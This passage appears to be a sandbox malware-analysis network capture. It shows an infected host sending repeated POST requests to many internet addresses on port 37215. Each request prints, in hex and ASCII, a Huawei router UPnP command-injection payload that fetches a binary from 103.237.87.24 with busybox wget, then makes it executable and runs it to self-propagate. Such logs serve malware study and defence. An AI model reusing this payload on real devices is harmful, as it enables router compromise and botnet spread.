2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2392192.168.2.134225035.50.44.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625210047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2393192.168.2.1344832187.51.75.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625220060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2394192.168.2.1336242197.173.126.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625221014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2395192.168.2.1349280157.234.145.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625237942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2396192.168.2.1356494208.247.30.22937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625243902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2397192.168.2.1342968157.39.189.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625245094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2398192.168.2.1349076159.193.129.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625252962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2399192.168.2.1354458157.135.8.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625274897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2400192.168.2.134450041.56.165.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625274897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2401192.168.2.1335492197.95.100.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625279903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2402192.168.2.1352190157.68.35.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625293016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
